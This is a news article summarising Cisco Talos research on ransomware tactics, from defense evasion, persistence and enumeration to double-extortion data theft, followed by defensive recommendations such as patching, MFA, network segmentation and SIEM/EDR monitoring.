Cisco Talos analyzes attack chains, network ransomware tactics

To avoid detection, ransomware actors employ “defense evasion methods” such as disabling or modifying security software, including anti-virus programs and endpoint detection solutions. They also often try to disable security features in the operating system to prevent the detection of the ransomware payload,” Nutland wrote. “Adversaries will also often obfuscate malicious software by packing and compressing the code, eventually unpacking itself in memory when executed. They’ll also modify the system registry to disable security alerts, configure the software to execute at startup, or block certain recovery options for users.”

Talos noted a number of additional ransomware trends, including:

  • MFA exploits: “Adversaries may send emails containing malicious attachments or URL links that will execute malicious code on the target system, deploying the actors’ tools and malware, and exploiting multi-factor authentication (MFA). There are many ways adversaries hope to bypass MFA, whether because of poor implementation or because they already have valid account credentials. Most notably, we have seen an increasing number of ransomware affiliates attempting to exploit vulnerabilities or misconfigurations in internet-facing systems, such as in legacy or unpatched software.”
  • Seeking long-term access: “…actors will look to establish long-term access, ensuring that their operations will be successful even if their initial intrusion is discovered and remediated.  Attackers often use automated malware persistence mechanisms, such as AutoStart execution upon system boot, or modify registry entries. Remote access software tools and create local, domain and/or cloud accounts can also be deployed to establish secondary credentialed access.”
  • Enumerating target environments: “Upon establishing persistent access, threat actors will then attempt to enumerate the target environment to understand the network’s structure, locate resources that can support the attack, and identify data of value that can be stolen in double extortion. Using various local utilities and legitimate services, they exploit weak access controls and elevate privileges to the administrator level to progress further along the attack chain.”
  • Using network scanner utilities: “We have observed the popular use of many network scanner utilities in conjunction with local operating system tools and utilities (living-off-the-land binaries) like Certutil, Wevtutil, Net, Nltes and Netsh to blend in with typical operating system functions, exploit trusted applications and processes, and aid in malware delivery.”
  • Double extortion: “In the shifting focus to a double extortion model, many adversaries collect sensitive or confidential information to send to an external adversary-controlled resource or over some C2 mechanism. File compression and encryption utilities WinRAR and 7-Zip have been used to conceal files for the unauthorized transfer of data, while adversaries often exfiltrate files using the previously mentioned legitimate RMM tools. Custom data exfiltration tools have been developed and used by the more mature RaaS operations, offering custom tooling such as Exbyte (BlackByte) and StealBit (LockBit) to facilitate data theft.”

Earlier this year Talos wrote that bad actors who are perpetrating advanced persistent threat (APT) attacks aren’t just looking to access your network. They want to sneak in and hang around to collect valuable data or lay plans for future attacks. Post-compromise threats are growing, and they’re aimed largely at aging network infrastructure and edge devices that are long past end-of-life stage and may have critical unpatched vulnerabilities.

Some of the things businesses can do to combat ransomware attacks include regularly and consistently applying patches and updates to all systems and software to address vulnerabilities promptly and reduce the risk of exploitation, according to Nutland. “Implement strong password policies that require complex, unique passwords for each account. Additionally, enforce multi-factor authentication (MFA) to add an extra layer of security,” Nutland stated.

Segmenting the network to isolate sensitive data and systems, preventing lateral movement in case of a breach. In addition to utilizing network access control mechanisms such as 802.1X to authenticate devices before granting network access, ensuring only authorized device connections, Nutland wrote.

“Implement a Security Information and Event Management (SIEM) system to continuously monitor and analyze security events, in addition to the deployment of EDR/XDR solutions on all clients and servers to provide advanced threat detection, investigation, and response capabilities,” Nutland wrote.



Source link